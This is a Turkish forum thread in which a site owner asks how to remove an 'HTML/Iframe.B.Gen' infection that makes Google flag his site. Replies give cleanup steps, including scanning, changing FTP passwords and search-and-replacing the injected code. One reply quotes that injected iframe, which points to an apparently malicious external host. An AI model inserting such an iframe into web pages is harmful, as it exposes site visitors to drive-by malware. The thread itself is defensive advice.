Selamlar Arkadaşlar Benim Sitemdeki sorun Google'de Uyarı Olarak cıkıyo Bu Site Bilgisayarınıza Zarar Verebilir Diyo Ben Bu Sorunu Nasıl Cözücem Bilgisi Olan Varmı
Tehdit: HTML/Iframe.B.Gen Virüs Olarak Algılıyo
Selamlar Arkadaşlar Benim Sitemdeki sorun Google'de Uyarı Olarak cıkıyo Bu Site Bilgisayarınıza Zarar Verebilir Diyo Ben Bu Sorunu Nasıl Cözücem Bilgisi Olan Varmı
Tehdit: HTML/Iframe.B.Gen Virüs Olarak Algılıyo
Geçmiş olsun :D Iframeler sana da bulaştı demek (: Sitede ne yüklü? En garanti çözüm dosyaları tek tek açıp kontrol etmek. Genelde en alt satırlarda falan oluyor... Host ya da server sana aitse, zaten temizleme araçları oluyor yönetim panelinde. Site ne sitesi? Smf ya da benzeri forum mu kurulu yoksa portal mı?
Neyse ben siteden bağımsız olarak anlatayım (:
Hocam iframe'lerbir siteye bulaşınca, tüm index dosyalarını haşat ediyor ve siteyiziyaret eden kullanıcının bilgisayarına da bulaşır. Yani yüksekihtimalle senin bilgisayarında da vardır. Ayrıca sitene bağlandığın ftpprogramında şifren ve kullanıcı adın kayıtlıysa, programı kapattığındabile bulaşma işlemi devam eder. Temizlemek için şu adımlarıizleyebilirsin:
0)Notepad++ programını indir. (Yüklemek için: http://downloads.sourceforge.net ... 5.4.5.Installer.exe)
1)Bilgisayarına sağlam bir virüs programı ve malware cleaner yükleyiptarama yap. Nod32 ve Norman Malware Cleaner iyi gider. Ücretsiz virüsprogramı kullanmak istiyorsan, sadece tek bir programla tarama yapmakyerine, iki üç programla tarama yapmanı tavsiye ederim. Hepsini tek tekyükleyip, tarama yapıp kaldırman şartıyla tabii ki (: Virüs programı veNorman Malware Cleaner(mükemmel bir temizleme aracı)'ı yüklediysen, virüs programından güncellemeni yapıp internet bağlantını kes.
NOT:NORMAN İÇİN İNDİRME ADRESİ:[http://normanasa.vo.llnwd.net/o2 ... Malware_Cleaner.exe]
2)Bilgisayarıntemizlendikten sonra, Ftp programına girip önbelleğindeki kayıtlışifreni falan temizle. (kestiğin bağlantıyı yamalamayı unutma tabi )
3)Sitenin yönetim paneline gir. (genelde http://www.siteadi.com/cpanelşeklindedir) Burada ftp şifreni bayağı karışık bir şeye çevir ve içindemutlaka sembol olsun birkaç tane. Aynı zamanda büyük küçük harfeduyarlı olması daha garantili olur.
4)Dosya adında index kelimesi geçen tümdosyaları bilgisayarına indir. Bu dosyaların iframe bulaşmadan öncekibir tarihte alınmış yedekleri varsa, direkt olarak değiştiripkurtulabilirsin virüsten. Eğer yoksa:
indirdiğiniz tüm dosyalarıNotepad++ programıyla açıp CTRL+F kombinasyonunu kullanarak bu tarzifadeleri bulup, Bul/Değiştir/Dosyada bul sekmelerinden "Değiştir"iseçerek açılan pencerede de "Tümünü Değiştir (Belge)" butonuna basarak,boşluk karakteriyle değiştirin aşağıdaki ifadeleri...
"
iframe src="http://www.k38n.cn/xl.htm" width="100" height="0" frameborder="0">"
İllabunlar olacak değil ama genelde dosyaların atında yazar. Herhangibirini kopyalayıp o iframe'yi aratın dosyalarda ve " " (boşluk/space)karakteriyle değiştirin hepsini.
5)Son olarak iframesiz index dosyalarını atın tekrardan ftp'ye...
Teşekkürler Kardeşim Denicem Bunları Saolasın Düzelince Sölicem Burda
Rica ederim. Merakla bekliyor olacağım sonucu (:
Geçenlerde başıma geldi bu olay iframe virüsü ftp şifrelerini ele geçirip istediği zaman ftp giriş yapa biliyor genelde index,default gibi dosylara girerek kendini görünmez hale getiriyor ve bu sitelere giren herkesin bilgisayarına bu virüs bulaşıyor iyi bir antivirüs ile korunması gerekiyor . windows/system32 içerisine kendi .exe dosyasını atıp siz ftp ile indexlerini düzeltip atsanız bile yinede sitenize virüs giriyor."Norman Malware Cleaner" gibi virüs programları harika ama bende bulunan iframe virüsnü silemediğinden ben format atmak zorunda kaldım.
Advanced Find and Replace
Bu program ile bütün sitenize bulaşan virüsün kodunu alıp bütün ftp bilgisayarınıza indirip taratmalısınız.